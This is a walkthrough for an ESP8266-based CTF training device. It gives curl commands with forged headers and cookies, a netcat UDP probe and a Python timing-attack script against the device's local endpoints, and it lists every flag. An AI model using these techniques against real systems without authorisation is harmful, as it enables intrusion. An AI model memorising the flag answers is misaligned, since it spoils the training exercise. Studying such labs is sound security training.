Welcome to the MiniBox CTF Trainer walkthrough! This guide will provide a step-by-step solution to each challenge implemented in the ESP8266 code, as well as explain how similar vulnerabilities can be found and exploited in real-life scenarios.
The MiniBox is an ESP8266-based device that sets up a Wi-Fi access point and provides various web-based challenges. Participants connect to the Wi-Fi network and interact with the device's APIs to discover flags hidden within responses, headers, or behaviors.
- SSID: MicroBox
- Password: 12345678
- Default Credentials (for some endpoints in EASY mode):
- Username: admin
- Password: password
- EASY: Default mode with standard challenges.
- HARD: Activated by holding down the button during startup. Hard mode introduces authentication and more complex challenges.
Endpoint: /api/led/on
- Enumerate Endpoints: Use tools like DirBuster, DirSearch, or simply try common API endpoints manually.
- Observation: Accessing
/api/led/onreturns a JSON response.
- Access the Endpoint:
curl http://192.168.4.1/api/led/on
- Response:
{ "message": "API LED is ON", "flag": "CTF{Mayb3_Th1s_1s_Th3_Fl4g}" } - Flag:
CTF{Mayb3_Th1s_1s_Th3_Fl4g}
- Unsecured IoT Endpoints: Devices exposing control endpoints without authentication can be manipulated by attackers.
- Data Leakage: Sensitive information (like flags or secrets) returned in responses.
Endpoint: /api/clients
- API Exploration: After finding
/api/led/on, check for other/api/endpoints. - Access Endpoint: Navigate to
/api/clients.
- Access the Endpoint:
curl http://192.168.4.1/api/clients
- Response:
{ "client_count": 1, "clients": [ {"mac": "AA:BB:CC:DD:EE:FF"} ], "flag": "CTF{May_the_flag_be_with_you}" } - Flag:
CTF{May_the_flag_be_with_you}
- Privacy Concerns: Devices revealing connected client information can lead to privacy breaches.
- Network Mapping: Attackers can map out connected devices for further exploitation.
Endpoint: /api/scan
- Continued API Enumeration: Testing standard endpoints like
/api/scan. - Access Endpoint: Navigate to
/api/scan.
- Access the Endpoint:
curl http://192.168.4.1/api/scan
- Response:
{ "network_count": 5, "networks": [ {"ssid": "Network1", "rssi": -40}, // ... ], "flag": "CTF{Th3_Fl4g_1s_H3r3}" } - Flag:
CTF{Th3_Fl4g_1s_H3r3}
- Information Disclosure: Devices scanning and revealing nearby networks can aid attackers in identifying potential targets.
- Regulatory Issues: Unauthorized scanning may violate regulations in some jurisdictions.
Endpoint: /api/buzzer/play
- API Exploration: Testing endpoints related to hardware control.
- Access Endpoint: Navigate to
/api/buzzer/play.
- Access the Endpoint:
curl http://192.168.4.1/api/buzzer/play
- Response:
{ "message": "Buzzer tested", "flag": "CTF{The_Big_Daddy_Flag}" } - Flag:
CTF{The_Big_Daddy_Flag}
- Unauthorized Access: Controlling hardware components can lead to physical disruptions.
- Security Risks: Manipulating devices remotely without proper authentication.
Endpoint: /api/hashiklis
- Access the Endpoint: Navigate to
/api/hashiklis. - Read the Hint: The response provides a riddle.
- Access the Endpoint:
curl http://192.168.4.1/api/hashiklis
- Response:
{ "message": "In my world, 32 characters I be, the sum of my parts, a hash you'll see. Seek me out in the land of MD5, and send me back for a reply." } - Interpretation:
- The hint refers to an MD5 hash.
- Generate an MD5 Hash:
- Use any string to generate an MD5 hash (32-character hexadecimal).
- Example:
Output:
echo -n "test" | md5sum
098f6bcd4621d373cade4e832627b4f6
- Submit the Hash:
curl -X POST -d "plain=098f6bcd4621d373cade4e832627b4f6" http://192.168.4.1/api/hashiklis - Response:
{ "flag": "CTF{Noob_with_a_Flag}" } - Flag:
CTF{Noob_with_a_Flag}
- Input Validation: Systems that expect specific input formats can be tricked if validation is weak.
- Hash Length Extension Attacks: Understanding hash functions can help in exploiting cryptographic weaknesses.
Endpoint: /TimeNewRoman
- Endpoint Naming: The endpoint name is a play on "Times New Roman", suggesting something with text.
- Access the Endpoint.
- Access the Endpoint:
curl http://192.168.4.1/TimeNewRoman
- Response:
{ "ciphered_flag": "FWH{GRQW_WRXFK_PB_IODJ}" } - Decipher the Flag:
- Recognize it's a Caesar cipher with a shift.
- Since
Cshifted by 3 becomesF, the shift is +3. - Decipher using a tool or script:
echo "FWH{GRQW_WRXFK_PB_IODJ}" | tr 'A-Za-z' 'D-ZA-Cd-za-c'
- Deciphered Flag:
CTF{DONT_TOUCH_MY_FLAG}
- Flag:
CTF{DONT_TOUCH_MY_FLAG}
- Weak Encryption: Simple ciphers are not secure but can be used to obfuscate data.
- Cryptanalysis: Understanding basic encryption helps in decrypting and analyzing secure communications.
7. Hidden UDP Broadcast (FLAG_9)
Behavior: The device broadcasts a UDP packet containing the flag.
- Network Scanning: Use tools like Wireshark to monitor network traffic.
- Observation: Notice UDP packets being broadcasted to port 1337.
- Capture the UDP Packet:
- Start Wireshark or tcpdump on the interface connected to the MicroBox.
- Filter for UDP traffic on port 1337:
udp.port == 1337
- Examine Packet Content:
- The UDP packet contains the flag:
CTF{Th3_Fl4g_1s_1n_Th3_C0d3}
- The UDP packet contains the flag:
- Eavesdropping: Unencrypted broadcasts can be intercepted by attackers.
- Information Leakage: Sensitive data should not be transmitted over unsecured channels.
Endpoint: /specialAgent
- Endpoint Guessing: Try accessing endpoints that suggest special handling.
- Access Endpoint: Navigate to
/specialAgentand receive a 403 Forbidden message.
- Modify User-Agent:
- The endpoint name suggests the need for a special
User-Agent.
- The endpoint name suggests the need for a special
- Send Request with Custom User-Agent:
curl -H "User-Agent: secret-agent" http://192.168.4.1/specialAgent - Response:
{ "flag": "CTF{UserAgent_Flag}" } - Flag:
CTF{UserAgent_Flag}
- User-Agent Filtering: Servers may provide different content based on the
User-Agent. - Bypassing Controls: Modifying headers can bypass simple security measures.
Endpoint: /cookieMonster
- Access Endpoint: Navigate to
/cookieMonsterand observe the response. - Response Indicates: "Cookie required" and sets a cookie.
- Inspect Cookies:
- The server sets
auth=challenge.
- The server sets
- Send Request with Modified Cookie:
- The goal is to change
authtoletmein.
- The goal is to change
- Send Request with Custom Cookie:
curl -H "Cookie: auth=letmein" http://192.168.4.1/cookieMonster - Response:
{ "flag": "CTF{Cookie_Monster_Flag}" } - Flag:
CTF{Cookie_Monster_Flag}
- Session Hijacking: Modifying cookies can grant unauthorized access.
- Poor Authentication: Relying solely on client-side data is insecure.
Endpoint: /hostSecret
- Access Endpoint: Navigate to
/hostSecretand receive a 403 Forbidden message. - Consider Host Header Manipulation.
- Modify Host Header:
- The endpoint likely checks for a specific
Hostheader.
- The endpoint likely checks for a specific
- Send Request with Custom Host:
curl -H "Host: secret.local" http://192.168.4.1/hostSecret - Response:
{ "flag": "CTF{Host_Header_Flag}" } - Flag:
CTF{Host_Header_Flag}
- Host Header Attacks: Manipulating the
Hostheader can lead to cache poisoning or access to unintended content. - Virtual Host Misconfigurations: Servers serving different content based on the
Hostheader.
Endpoint: /timingAttack (POST request)
- Access Endpoint: Observe that the server responds differently based on input timing.
- Suspect a Timing Attack Vulnerability.
-
Understand the Challenge:
- The server delays response based on correct characters.
-
Automate the Attack:
- Write a script to measure response times for different inputs.
-
Example in Python:
import requests import time url = "http://192.168.4.1/timingAttack" charset = "CTF{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_}" discovered = "" while True: max_time = 0 next_char = '' for c in charset: test_input = discovered + c start_time = time.time() response = requests.post(url, data={'input': test_input}) elapsed = time.time() - start_time if elapsed > max_time: max_time = elapsed next_char = c discovered += next_char print(f"Discovered so far: {discovered}") if next_char == '}': break
-
Flag:
CTF{Timing_Is_Everything}
- Timing Attacks: Exploiting time differences in responses to extract sensitive information.
- Cryptographic Weaknesses: Systems not using constant-time operations are vulnerable.
Endpoint: /superSecret
- Access Endpoint: Navigate to
/superSecret. - Response Contains Hex Data.
- Access the Endpoint:
curl http://192.168.4.1/superSecret
- Response:
{ "data": "4354467b4865785f4861636b65727d" } - Decode the Hex String:
echo "4354467b4865785f4861636b65727d" | xxd -r -p
- Decoded Flag:
CTF{Hex_Hacker}
- Data Encoding: Sensitive data may be encoded in various formats.
- Data Extraction: Understanding encoding schemes aids in data recovery.
Endpoint: /captcha
- Access Endpoint: Navigate to
/captchaand receive a math question.
- Get the Question:
curl http://192.168.4.1/captcha
- Response:
{ "question": "What is 7 + 3?" } - Calculate Answer:
- 7 + 3 = 10
- Submit the Answer:
curl -X POST -d "answer=10" http://192.168.4.1/captcha - Response:
{ "flag": "CTF{Captcha_Cracked}" } - Flag:
CTF{Captcha_Cracked}
- CAPTCHA Bypassing: Simple CAPTCHAs can be bypassed with automation.
- Bot Protection: Implementing stronger CAPTCHAs or alternative verification methods.
Behavior: Sending a specific UDP packet to receive a flag.
- Port Scanning: Notice that the device listens on UDP port 1337.
- Attempt to Communicate: Send data to the port and observe responses.
-
Send the Specific Packet:
echo -n "pleaseSendFlag" | nc -u -w1 192.168.4.1 1337
-
Receive the Response:
- The device sends back
CTF{UDP_Secret_Unveiled}
- The device sends back
-
Flag:
CTF{UDP_Secret_Unveiled}
- Hidden Services: Devices may have undocumented services listening on non-standard ports.
- Service Enumeration: Comprehensive scanning can reveal such hidden services.
Behavior: In HARD mode, certain information requires authentication.
- Authentication Requirement: Upon accessing certain endpoints, the server requests authentication.
- Brute Forcing Not Feasible: Credentials are randomly generated.
- Physical Access: Since the device is in your possession, you can observe the display.
- Read Credentials:
- The OLED display shows the username and password.
- Use Credentials:
- Use the displayed credentials to authenticate.
- Access Restricted Endpoints:
- Proceed to explore and find remaining flags.
- Physical Security: Devices should not display sensitive information.
- Local Attacks: Attackers with physical access can extract data from devices.
This walkthrough demonstrates how to systematically approach and solve various challenges in the MiniBox CTF Trainer. In real-life scenarios, similar techniques can be employed by security professionals to test systems for vulnerabilities:
- Enumeration: Discovering available services, endpoints, and functionalities.
- Manipulation: Altering headers, cookies, and other request parameters.
- Exploitation: Leveraging vulnerabilities to gain unauthorized access or retrieve sensitive information.
- Mitigation: Understanding these vulnerabilities emphasizes the importance of implementing proper security measures.
- Authentication and Authorization: Ensure all sensitive endpoints require proper authentication.
- Input Validation: Validate and sanitize all user inputs.
- Secure Communication: Use encryption (HTTPS) to protect data in transit.
- Least Privilege: Limit the information disclosed to what is necessary.
- Regular Updates: Keep firmware and software updated to patch known vulnerabilities.
- Physical Security: Prevent unauthorized physical access to devices.
By understanding and practicing these challenges, participants can improve their cybersecurity skills and apply them to protect real-world systems.